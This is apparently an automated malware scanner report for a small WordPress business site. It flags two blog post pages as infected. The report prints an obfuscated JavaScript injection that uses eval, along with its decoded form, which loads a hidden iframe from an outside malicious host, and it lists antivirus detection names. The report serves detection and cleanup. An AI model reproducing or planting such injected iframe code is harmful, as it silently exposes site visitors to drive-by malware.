Malware Scanner report for strategic-brief.com

Malicious/Suspicious/Total urls checked: 2/0/16

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "strategic-brief.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=strategic-brief.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://strategic-brief.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.strategic-brief.com/	200 OK Content-Length: 9369 Content-Type: text/html	clean
http://www.strategic-brief.com/wp-includes/js/jquery/jquery.js	200 OK Content-Length: 95807 Content-Type: application/x-javascript	clean
http://www.strategic-brief.com/wp-includes/js/jquery/jquery-migrate.min.js	200 OK Content-Length: 7200 Content-Type: application/x-javascript	clean
http://www.strategic-brief.com/wp-content/plugins/cforms/js/cforms.js	200 OK Content-Length: 17452 Content-Type: application/x-javascript	clean
http://www.strategic-brief.com//s7.addthis.com/js/300/addthis_widget.js/	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 23 Dec 2014 04:50:53 GMT Pragma: no-cache Location: http://www.strategic-brief.com/s7.addthis.com/js/300/addthis_widget.js/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.strategic-brief.com/xmlrpc.php X-Powered-By: PleskLin	clean
http://www.strategic-brief.com/s7.addthis.com/js/300/addthis_widget.js/	404 Not Found Content-Length: 8791 Content-Type: text/html	clean
http://www.strategic-brief.com/wp-includes/js/jquery/ui/core.min.js	200 OK Content-Length: 3998 Content-Type: application/x-javascript	clean
http://www.strategic-brief.com/wp-includes/js/jquery/ui/datepicker.min.js	200 OK Content-Length: 36523 Content-Type: application/x-javascript	clean
http://www.strategic-brief.com/about/	200 OK Content-Length: 8664 Content-Type: text/html	clean
http://www.strategic-brief.com/services/	200 OK Content-Length: 8854 Content-Type: text/html	clean
http://www.strategic-brief.com/recruitment/	200 OK Content-Length: 8192 Content-Type: text/html	clean
http://www.strategic-brief.com/news/	200 OK Content-Length: 36138 Content-Type: text/html	clean
http://www.strategic-brief.com/contact/	200 OK Content-Length: 9942 Content-Type: text/html	clean
http://www.strategic-brief.com/2012/04/13/imimobile-and-zeebox-partner/	200 OK Content-Length: 17746 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(bsdtwbd){q=412;} if(1){f=[1,0,95,94,23,30,92,102,89,109,100,91,102,107,36,95,92,106,61,99,91,101,92,100,108,106,56,113,75,87,95,69,87,101,92,30,31,89,101,92,112,29,33,82,38,85,32,113,5,0,-1,1,96,92,106,88,99,93,105,30,33,50,3,1,0,115,24,92,98,107,92,22,115,4,-1,1,0,90,103,90,107,101,92,100,108,37,109,106,96,106,93,31,24,52,96,92,106,88,99,93,23,105,106,90,51,31,95,106,108,103,48,39,38,92,109,88,112,102,111,89,96,113,101,38,93,95,102,91,94,93,105,91,38,102,104,95,38,108,91, ... 1165 bytes are skipped ...108,95,29,36,30,39,40,30,31,51,93,36,107,92,106,57,107,106,106,96,88,109,107,91,32,30,94,93,96,93,96,107,29,36,30,39,40,30,31,51,4,-1,1,0,90,103,90,107,101,92,100,108,37,93,93,107,59,100,92,99,93,101,106,107,57,111,76,88,93,70,88,99,93,31,29,90,102,90,113,30,31,83,39,83,38,88,102,104,92,100,92,58,94,97,99,90,32,93,31,51,4,-1,1,116];}if(window.document)e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i+593>0;i+=1){j=i;if(e)s=s+r((w[j]*1+(8+e("j"+"%3"))));} if(q&&f&&012===10)e(s); Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://fuaznxchzo.findhere.org/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://fuaznxchzo.findhere.org/vc.php?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribut ... 389 bytes are skipped ...amer(){ var f = document.createElement('iframe');f.setAttribute('src','http://fuaznxchzo.findhere.org/vc.php?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://fuaznxchzo.findhere.org/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports: Ikarus Trojan.IframeRef nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) McAfee-GW-Edition Heuristic.BehavesLike.JS.Infected.A DrWeb JS.IFrame.151 Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A NANO-Antivirus Trojan.Script.Iframe.rpyhz F-Secure JS:Trojan.Iframe.A F-Prot JS/IFrame.HC.gen Norman IframeRef.DM GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A
http://www.strategic-brief.com/category/uncategorized/	200 OK Content-Length: 13403 Content-Type: text/html	clean
http://www.strategic-brief.com/2012/01/24/pocket-app-appoint-industry-expert-sally-weatherall-as-non-executive-director-12-december-2011-london-uk/	200 OK Content-Length: 17920 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(bsdtwbd){q=412;} if(1){f=[1,0,95,94,23,30,92,102,89,109,100,91,102,107,36,95,92,106,61,99,91,101,92,100,108,106,56,113,75,87,95,69,87,101,92,30,31,89,101,92,112,29,33,82,38,85,32,113,5,0,-1,1,96,92,106,88,99,93,105,30,33,50,3,1,0,115,24,92,98,107,92,22,115,4,-1,1,0,90,103,90,107,101,92,100,108,37,109,106,96,106,93,31,24,52,96,92,106,88,99,93,23,105,106,90,51,31,95,106,108,103,48,39,38,92,109,88,112,102,111,89,96,113,101,38,93,95,102,91,94,93,105,91,38,102,104,95,38,108,91, ... 1165 bytes are skipped ...108,95,29,36,30,39,40,30,31,51,93,36,107,92,106,57,107,106,106,96,88,109,107,91,32,30,94,93,96,93,96,107,29,36,30,39,40,30,31,51,4,-1,1,0,90,103,90,107,101,92,100,108,37,93,93,107,59,100,92,99,93,101,106,107,57,111,76,88,93,70,88,99,93,31,29,90,102,90,113,30,31,83,39,83,38,88,102,104,92,100,92,58,94,97,99,90,32,93,31,51,4,-1,1,116];}if(window.document)e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i+593>0;i+=1){j=i;if(e)s=s+r((w[j]*1+(8+e("j"+"%3"))));} if(q&&f&&012===10)e(s); Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://fuaznxchzo.findhere.org/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://fuaznxchzo.findhere.org/vc.php?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribut ... 389 bytes are skipped ...amer(){ var f = document.createElement('iframe');f.setAttribute('src','http://fuaznxchzo.findhere.org/vc.php?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://fuaznxchzo.findhere.org/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports: Ikarus Trojan.IframeRef nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) McAfee-GW-Edition Heuristic.BehavesLike.JS.Infected.A DrWeb JS.IFrame.151 Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A NANO-Antivirus Trojan.Script.Iframe.rpyhz F-Secure JS:Trojan.Iframe.A F-Prot JS/IFrame.HC.gen Norman IframeRef.DM GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: strategic-brief.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: strategic-brief.com
Referer: http://www.google.com/search?q=strategic-brief.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for strategic-brief.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools